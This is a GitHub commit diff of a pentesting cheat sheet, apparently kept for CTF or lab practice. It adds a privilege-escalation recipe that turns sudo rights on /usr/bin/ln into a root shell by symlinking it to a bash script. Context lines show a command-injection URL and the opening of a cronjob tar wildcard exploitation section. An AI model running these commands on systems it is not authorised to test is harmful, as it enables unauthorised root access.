Update Cheat Sheet.md

This commit is contained in:
AbdullahRizwan101 2021-01-14 00:45:08 +05:00 committed by GitHub
parent f2bce717c7
commit b6be592f0f
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -126,6 +126,17 @@ Login as any user to see that it gets logged then try to login with a malicious
Then `http://ip/page?a=whoami;`
### Getting root with ln (symlink)
If we have permissions to run /usr/bin/ln as root we can onw the machine
```
echo 'bash' > root
chmod +x root
sudo /usr/bin/ln -sf /tmp/root /usr/bin/ln
sudo /usr/bin/ln
```
### Tar Exploitation
When ever you see a cronjob running with a command `cd /<user>/andre/backup tar -zcf /<folder>/filetar.gz *` go to that folder from which a backup is being created and running these command in that directory <br/ >